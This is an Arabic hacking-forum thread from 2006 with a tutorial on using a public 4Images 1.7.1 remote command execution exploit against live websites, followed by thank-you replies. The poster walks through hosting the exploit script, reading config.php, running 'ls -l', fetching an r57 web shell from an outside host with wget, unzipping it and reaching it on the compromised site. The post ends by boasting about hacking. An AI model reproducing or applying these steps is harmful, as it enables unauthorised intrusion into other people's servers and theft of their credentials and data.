طـريقة استغـلال ثغـرات الـ php مـع التطبيق

°·.·° KUWAITY ¤ M5RBHA °·.·° · 04-01-2006, 05:29 PM

الـسلام عليكم ورحمـة الله وبــركاته

بندخل بالموضوع بدون مقدمات :)))

طيب اول شي كيف تعرف انها php ?

بتـلقاهآ اول الكـود حق الثغـره مكتـوب جذي

كود PHP:

كود PHP:


			
<?php

طيـب آستغلال الثغـرات هذي تـحفظهـا بآمتداد php وتـرفعه على موقـع , مثـل ليوكس او غيره ,

طيـب بناخـذ ثغرة

كود:

كود PHP:


			
4Images <= 1.7.1 remote commands execution through arbitrary local

الثــغره في البــوٍوٍم الصـور 4Images الاصــدار : 1.7.1

طيــب هــذآ سورس الثغــره الي نـزل في مـواقع السكـيورتي ,

http://www.milw0rm.com/exploits/1533

مثل ماشفنـا في بـداية الكـود <?php اوكـ, الحـين احـفظ الثغـره في جهـازك وانا سميتها جذي saudi.php

لاحظ الامتداد الي حطـيته php ورح ارفــعها على موقع يقبل هالامتــداد , وانـا رفعتـها على مـوقع وهـذا رابط الثغـره ,

http://www.web4new.com/gallery/saudi.php

طبـعا الطـلبات واضـحه ,,

اول خيــآر : رابــط المـوقع واحط مثــال هو , www.sitename.com

ثــآني خيآر : آســم المجلد ع المـوٍوٍقـع , وحــاط مثـال هو /4images/ or just او غيـره

ثـالث خيـآر : (آمــر لينكس او ويندوز) وحــاط مثال هـو specify a command ("cat config.php" ,

وامـر لينكس مهــمه جـدا والكل لازم يعـرفها او يآخذ نبذه بسيـطه عنـها عشـان يعرف يتعـامل مع هالنظام ,

طبعا احنا اخذنا الخيارات المهمه اول ثلاث خيارات الي حـاط عليــها * نجمه ,

طيب بنطـبق على مـوقع مصـاب ونــشوف

مثل ماشفنا في الصـوره كتـبت الامـر ls -l وهو لـعرض الملفات مـع تصاريحها ,

وهـذي هي المـلفات طيــب الحيـن نشوفلنا ملف تصريحه 777 ومـلف data تصريحه 777 مثل مانشـوف في الصوره

بس الملف الي احنا علي تصريحه 777 اكتـب بدال الامر ls -l الامر هذا which wget وبيقــولك !/usr/bin/wget

يعنــي تقــدر تـرفع طيب تمـام الحيــن نرفع لنـا شل ,

مثل ماشفــنا في الصـوره كتـبت جذي

كود:

كود PHP:


			
wget http://www.web4new.com/gallery/r57****l.zip

wget = آمــر الرفع والرابــط رآبـط الشل ,

وآظغــط (GO)

طـيب الحيــن عشــان تتآكد انه ارتـــفع روح واكتـب الامر ls -l وبتـشوفه مع المـلفات

كـل شي تمام طيب الحين تفـك الظغـط عن الشـل

unzip = امـر فك الظـغط

r57****l.zip = المـلف الي رفعناه

ولاحـظ الصوره بعد ماظغطنــا go , فـك الظغـط , وطـلع الملف r57****l.php ,

وهــذي صـوره توضــح ..

خــلاص الحـين كل شي تــمام تشــوف مســارك ويـن ....

pwd : امـر يحدد مسـارك ع السيرفر ,

مثل ماشفـنا في الصــوره عطانا المسـار الي احنـا فيه .....

كود:

كود PHP:


			
/home/mubailes/public_html/main

فــي المجلد الرئيسي تبع الموقع في مجلد main يعني هنا بيكون الشل

www.xxxx.com/main/r57****l.php ,

وهــذي الصــوره بعد دخــولنا على الشــل ,

وبهكــذا ان شاء الله نكون عـرٍرٍفنا كيف نستغـل ثغـرات الـ php واخذنـا الثغـره هذي كمثــال ,
واكيــد كل ثغـره يفرق استثماره عن الثاني وان شاء الله يكون الـدرس واضـح واي سـؤال انا حاضـر ,

[glow=FF0000]اختراق في اختراق والايام بيننا[/glow] dkhan

تقبلووو تحياتي ,,,

°·.·° KUWAITY ¤ M5RBHA °·.·° · 04-02-2006, 12:02 PM

بَـلْ ....!!

آلمُشآهَده آرٍبعطشْ وٍآحَد وٍلآ فـِي رٍدوٍدْ

@!@

ولد المرر · 04-02-2006, 12:07 PM

إمبراطور الهكر

السلام عليكم ورحمة الله وبركاته ...... لا تستعجل على القراء .... جالسين يقرأون الموضوع بيردون على موضوعك الحلوووو .... تسلم يمناك

ويعطيك الله العافية .... تحياتي لك ....

جرح الزمن · 04-07-2006, 02:27 PM

[align=center]يعطيك العافية على كل جديد

امل ان الجميع يستفيد

دمت بخير[/align]

°·.·° KUWAITY ¤ M5RBHA °·.·° · 04-07-2006, 08:52 PM

ـآلـعَـفـُوٍوٍوٍوٍوٍَ حـَبـآيـٍبْ إلـْـبِــي

الله يــِ،،،ــلـمـَكْـمْ

وٍيـ،،،ـلـمـًـوٍوٍوٍ علـَىىى ـآلـمـرٍوٍرٍ

عبير البدره · 04-18-2006, 03:00 PM

مخربهااااااااااا

يعطيك الف عاااافيه يا خوي

ومشكور وما قصرت على هذاالمجهود الرائع

تحياتي الك

عبووووره

الــمــتــمــرد · 09-27-2006, 04:08 AM

مشكووور مخربها

يعطيك مليووون عافيه اخي

!@ولد@الكويت@! · 09-29-2006, 09:44 PM

مشكوور اخوي علي المووضوووع
ويعطيك الف عافيه

أدوات الموضوع
عرض نسخة صالحة للطباعة أرسل هذا الموضوع إلى صديق
طرق مشاهدة الموضوع
العرض العادي الانتقال إلى العرض المتطور الانتقال إلى العرض الشجري

الذين يشاهدون محتوى الموضوع الآن : 1 ( الأعضاء 0 والزوار 1)